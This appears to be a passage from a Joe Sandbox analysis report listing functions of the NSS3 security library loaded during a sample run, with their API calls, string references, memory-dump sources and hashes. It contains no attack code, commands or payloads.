                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E514071A002059FDB04CFA9D8D0AAEBBB1EF4C308F14406DE905AB756E735ED95DBA0
                                                                                                                                                                                                                            Function 6CB78CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,00000000,?,6CB8124D,00000001), ref: 6CB78D19
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6CB8124D,00000001), ref: 6CB78D32
                                                                                                                                                                                                                            • PL_ArenaRelease.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78D73
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78D8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78DBA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                            • String ID: KRAM$KRAM
                                                                                                                                                                                                                            • API String ID: 2419422920-169145855
                                                                                                                                                                                                                            • Opcode ID: ee62025cfb6097e9d7290dd0e99f2dda20325b652edf361e8f1bc986d9ca0e0f
                                                                                                                                                                                                                            • Instruction ID: 59069c0fc9584cc54fa95d7cd028953242bc9c08006014fbc30c86c3a5fb6608
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee62025cfb6097e9d7290dd0e99f2dda20325b652edf361e8f1bc986d9ca0e0f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0217CB1A046518FCB10EF78C58455ABBF0FF45318F15896EDCA897701E731E841CBA2
                                                                                                                                                                                                                            Function 6CB9ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CB9ACE6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB9AD14
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AD23
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB9AD39
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                                                                            • API String ID: 332880674-3521875567
                                                                                                                                                                                                                            • Opcode ID: 718631b9e0d0b8385f1aba40aa53ead0c992fc6079ad3bfacd096142b9f79bed
                                                                                                                                                                                                                            • Instruction ID: 62ddb74bc30a1f79b07ee11b3821af3af5567c20577a08383defc27df53cc4ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 718631b9e0d0b8385f1aba40aa53ead0c992fc6079ad3bfacd096142b9f79bed
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9212670A011A49FDB109B64DC98BAF37B5EF4331EF054035E40A97A61EB309E49CBA2
                                                                                                                                                                                                                            Function 6CC34D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34DC3
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC34DE0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6CC34DBD
                                                                                                                                                                                                                            • invalid, xrefs: 6CC34DB8
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC34DCB
                                                                                                                                                                                                                            • misuse, xrefs: 6CC34DD5
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CC34DDA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                            • API String ID: 632333372-2974027950
                                                                                                                                                                                                                            • Opcode ID: 4c867181e999fe0ddfb578bc0179dd2e8ccbd78af533fb00a31bf237f9e68787
                                                                                                                                                                                                                            • Instruction ID: faf277b64b06aab4129acb2eb1575fe84d0517deddc79d250de2a4334cbb187d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c867181e999fe0ddfb578bc0179dd2e8ccbd78af533fb00a31bf237f9e68787
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7F0B421E146B46BD6028155EC10F863B555F01719F4619E0FD0C7BE52F20799608281
                                                                                                                                                                                                                            Function 6CC34DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34E30
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC34E4D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6CC34E2A
                                                                                                                                                                                                                            • invalid, xrefs: 6CC34E25
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC34E38
                                                                                                                                                                                                                            • misuse, xrefs: 6CC34E42
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CC34E47
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                            • API String ID: 632333372-2974027950
                                                                                                                                                                                                                            • Opcode ID: 6b84295c7c7966b3437f23d07a2e54022c3884c95ed6f2bd34f8cfd94e1a6347
                                                                                                                                                                                                                            • Instruction ID: b69dce707ea00ef76ae749d81d3da045e10d826afac5d9fa0616d79f7f65aa61
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b84295c7c7966b3437f23d07a2e54022c3884c95ed6f2bd34f8cfd94e1a6347
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48F02721F48978AFE6109165FC10F877B855B01329F0994B1FA0C77ED2F30B997042D1
                                                                                                                                                                                                                            Function 6CBA0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?,?,00000000,?,?), ref: 6CBA0CB3
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?), ref: 6CBA0DC1
                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?), ref: 6CBA0DEC
                                                                                                                                                                                                                              • Part of subcall function 6CBC0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CB62AF5,?,?,?,?,?,6CB60A1B,00000000), ref: 6CBC0F1A
                                                                                                                                                                                                                              • Part of subcall function 6CBC0F10: malloc.MOZGLUE(00000001), ref: 6CBC0F30
                                                                                                                                                                                                                              • Part of subcall function 6CBC0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CBC0F42
                                                                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0DFF
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000), ref: 6CBA0E16
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0E53
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?,?,6CBA1444,?,?,00000000), ref: 6CBA0E65
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBA1444,?,00000001,?,00000000,00000000,?), ref: 6CBA0E79
                                                                                                                                                                                                                              • Part of subcall function 6CBB1560: TlsGetValue.KERNEL32(00000000,?,6CB80844,?), ref: 6CBB157A
                                                                                                                                                                                                                              • Part of subcall function 6CBB1560: EnterCriticalSection.KERNEL32(?,?,?,6CB80844,?), ref: 6CBB158F
                                                                                                                                                                                                                              • Part of subcall function 6CBB1560: PR_Unlock.NSS3(?,?,?,?,6CB80844,?), ref: 6CBB15B2
                                                                                                                                                                                                                              • Part of subcall function 6CB7B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CB81397,00000000,?,6CB7CF93,5B5F5EC0,00000000,?,6CB81397,?), ref: 6CB7B1CB
                                                                                                                                                                                                                              • Part of subcall function 6CB7B1A0: free.MOZGLUE(5B5F5EC0,?,6CB7CF93,5B5F5EC0,00000000,?,6CB81397,?), ref: 6CB7B1D2
                                                                                                                                                                                                                              • Part of subcall function 6CB789E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CB788AE,-00000008), ref: 6CB78A04
                                                                                                                                                                                                                              • Part of subcall function 6CB789E0: EnterCriticalSection.KERNEL32(?), ref: 6CB78A15
                                                                                                                                                                                                                              • Part of subcall function 6CB789E0: memset.VCRUNTIME140(6CB788AE,00000000,00000132), ref: 6CB78A27
                                                                                                                                                                                                                              • Part of subcall function 6CB789E0: PR_Unlock.NSS3(?), ref: 6CB78A35
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1601681851-0
                                                                                                                                                                                                                            • Opcode ID: 2841fa3a477a3bde3046d616660a5439de703fdd4967182e89a585d969890994
                                                                                                                                                                                                                            • Instruction ID: 6fa482f18d21a14a384bdfc670c88a19b1054374793951ea81f58572a9306a8d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2841fa3a477a3bde3046d616660a5439de703fdd4967182e89a585d969890994
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A51BAB6D052905FEB109FA4EC41ABF37A8DF05218F150464EC569BB12FB31ED1987A3
                                                                                                                                                                                                                            Function 6CB79C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CB78850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CB80715), ref: 6CB78859
                                                                                                                                                                                                                              • Part of subcall function 6CB78850: PR_NewLock.NSS3 ref: 6CB78874
                                                                                                                                                                                                                              • Part of subcall function 6CB78850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CB7888D
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CB79CAD
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB79CE8
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6CB7ECEC,6CB82FCD,00000000,?,6CB82FCD,?), ref: 6CB79D01
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6CB7ECEC,6CB82FCD,00000000,?,6CB82FCD,?), ref: 6CB79D38
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6CB7ECEC,6CB82FCD,00000000,?,6CB82FCD,?), ref: 6CB79D4D
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB79D70
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB79DC3
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CB79DDD
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB80725,00000000,00000058), ref: 6CB78906
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: EnterCriticalSection.KERNEL32(?), ref: 6CB7891A
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CB7894A
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: calloc.MOZGLUE(00000001,6CB8072D,00000000,00000000,00000000,?,6CB80725,00000000,00000058), ref: 6CB78959
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CB78993
                                                                                                                                                                                                                              • Part of subcall function 6CB788D0: PR_Unlock.NSS3(?), ref: 6CB789AF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3394263606-0
                                                                                                                                                                                                                            • Opcode ID: b42985fc87380ec22b9c4840d6524b6b453410d47be4a490396d0b08524a8db0
                                                                                                                                                                                                                            • Instruction ID: d7b95054466d3a997b7b2787fe5c4e6fbd0e979a318233b3df6b32f5c0514e50
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b42985fc87380ec22b9c4840d6524b6b453410d47be4a490396d0b08524a8db0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95514F71A047558FDB10EF68C1846AEBBF1FF44359F158569DCA89B710EB30E844CBA2
                                                                                                                                                                                                                            Function 6CB6DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6CB6DCFA
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB6DD40
                                                                                                                                                                                                                            • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CB6DD62
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB6DD71
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB6DD81
                                                                                                                                                                                                                            • CERT_RemoveCertListNode.NSS3(?), ref: 6CB6DD8F
                                                                                                                                                                                                                              • Part of subcall function 6CB806A0: TlsGetValue.KERNEL32 ref: 6CB806C2
                                                                                                                                                                                                                              • Part of subcall function 6CB806A0: EnterCriticalSection.KERNEL32(?), ref: 6CB806D6
                                                                                                                                                                                                                              • Part of subcall function 6CB806A0: PR_Unlock.NSS3 ref: 6CB806EB
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB6DD9E
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB6DDB7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 653623313-0
                                                                                                                                                                                                                            • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                            • Instruction ID: 861904bf8d569cf8114dbe65d25de9c18ebe91fe5f91db9359ed40a57cb11e82
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 542180B6E012A59BDF01AFA6EC409DE77B4EF05318B240065E914A7B15F731ED148BE2
                                                                                                                                                                                                                            Function 6CB63C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,6CBD460B,?,?), ref: 6CB63CA9
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB63CB9
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?), ref: 6CB63CC9
                                                                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CB63CD6
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB63CE6
                                                                                                                                                                                                                            • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CB63CF6
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB63D03
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB63D15
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
